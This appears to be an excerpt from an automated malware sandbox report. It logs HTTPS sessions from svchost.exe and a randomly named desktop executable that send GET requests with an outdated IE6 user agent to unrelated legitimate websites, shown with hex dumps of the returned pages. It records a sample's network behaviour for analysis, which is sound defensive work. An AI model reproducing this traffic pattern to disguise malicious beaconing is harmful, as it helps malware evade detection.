                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC318OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC408INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:19 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:19 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        Set-Cookie: django_language=en; expires=Sat, 09-Mar-2024 06:46:19 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BAlaineIXQquoEBP0cXugR8lTTJGDC4lUd%2B9%2BNRssAYxUNd56tT5IbpbVscmNj99OfXB%2FnX5jWngjuu5Q10tNaYOs7s8L2i8%2BzX1xCsBmc4NM%2F4bShGkT9MfeyfGa%2B1B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a81ccf6830f3-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC409INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC409INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        22192.168.2.65317091.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC319OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC328INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC344INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC360INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC376INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        23192.168.2.653163188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC319OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ac1zuV%2FlOzcmId%2FzgLSz5ydmvbSZ7MyjA7mXATXXD6s7KneNOJzHltfxGTGTLqYkmmf7ToS50IqYzL14pGUeMZcv9qLORuC%2Bwx6PGoZrzp4l1GnsXxLeD8JP%2Bweo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a81d0ec7bbf5-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC320INData Raw: 31 65 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebb<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC320INData Raw: 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20
                                                                                                                                                                                                                                                                        Data Ascii: idth,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC322INData Raw: 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 6d 53 68 6a 49 79 45 6b 79 67 65 34 63 32 71 73 69 75 44 7a 31 4d 6b 65 6d 31 65 41 70 36 43 77 4e 43 37 37 75 65 56 56 53 44 55 2d 31 36 37 38 34 33 31 33 37 34 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 74 61 51 6a 34 75 4d 78 64 4f 57 64 51 47 4e 78 55 68 37 65 4b 53 44 65 62 6c 46 64 56 34 63 43 35 5f 57 48 51 62 62 49 43 35 55 2d 31 36 37 38 34 33 31 33 37 34 2d
                                                                                                                                                                                                                                                                        Data Ascii: ion="/?__cf_chl_f_tk=mShjIyEkyge4c2qsiuDz1Mkem1eAp6CwNC77ueVVSDU-1678431374-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="taQj4uMxdOWdQGNxUh7eKSDeblFdV4cC5_WHQbbIC5U-1678431374-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC323INData Raw: 31 37 69 4a 44 30 5a 72 63 34 6b 59 58 6d 4e 38 42 42 4d 53 6c 4a 4a 30 46 2d 70 43 4d 71 30 57 74 49 65 76 69 55 4e 44 33 72 61 78 62 2d 34 55 68 79 58 6e 45 74 46 37 4e 6a 55 68 76 74 44 63 4a 42 68 32 49 4c 58 6d 31 67 57 4f 54 4b 4c 59 62 61 6b 42 56 56 61 74 39 6c 47 30 35 6f 4f 6d 69 48 74 4d 59 32 68 65 72 72 30 48 36 70 48 7a 74 46 4d 4d 4a 41 55 4f 39 35 6d 67 44 36 6f 48 45 4e 47 6d 50 79 56 45 42 5f 61 67 2d 67 42 6e 66 47 5f 56 42 30 62 56 77 4f 65 65 46 5a 57 35 4d 5f 53 39 62 6b 34 78 42 39 4b 51 38 6c 65 6d 38 4c 35 52 6d 48 54 61 6f 36 6b 4c 4e 42 49 67 65 6e 4c 72 6e 66 79 43 75 6b 77 66 49 49 72 39 54 65 79 76 6d 61 68 4e 30 58 6b 7a 6e 30 6d 62 4d 54 77 6f 32 6d 46 37 2d 2d 63 6f 67 55 4a 38 67 43 49 36 4f 34 73 7a 6f 52 50 6c 2d 30 55
                                                                                                                                                                                                                                                                        Data Ascii: 17iJD0Zrc4kYXmN8BBMSlJJ0F-pCMq0WtIeviUND3raxb-4UhyXnEtF7NjUhvtDcJBh2ILXm1gWOTKLYbakBVVat9lG05oOmiHtMY2herr0H6pHztFMMJAUO95mgD6oHENGmPyVEB_ag-gBnfG_VB0bVwOeeFZW5M_S9bk4xB9KQ8lem8L5RmHTao6kLNBIgenLrnfyCukwfIIr9TeyvmahN0Xkzn0mbMTwo2mF7--cogUJ8gCI6O4szoRPl-0U
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC324INData Raw: 20 63 52 61 79 3a 20 27 37 61 35 39 61 38 31 64 30 65 63 37 62 62 66 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 32 61 37 38 62 38 33 33 31 35 39 64 38 62 37 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6d 53 68 6a 49 79 45 6b 79 67 65 34 63 32 71 73 69 75 44 7a 31 4d 6b 65 6d 31 65 41 70 36 43 77 4e 43 37 37 75 65 56 56 53 44 55 2d 31 36 37 38 34 33 31 33 37 34 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20
                                                                                                                                                                                                                                                                        Data Ascii: cRay: '7a59a81d0ec7bbf5', cHash: '2a78b833159d8b7', cUPMDTk: "\/?__cf_chl_tk=mShjIyEkyge4c2qsiuDz1Mkem1eAp6CwNC77ueVVSDU-1678431374-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC326INData Raw: 57 72 56 47 5a 49 54 50 69 65 4b 4b 72 49 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 32 35 6b 72 5a 4f 65 7a 4e 69 6d 66 44 53 47 55 46 59 49 73 47 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c
                                                                                                                                                                                                                                                                        Data Ascii: WrVGZITPieKKrIQ==', i2: '25krZOezNimfDSGUFYIsGw==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC327INData Raw: 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="content
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC328INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        24192.168.2.6532635.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC360OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC376INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC376INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC392INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC409INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
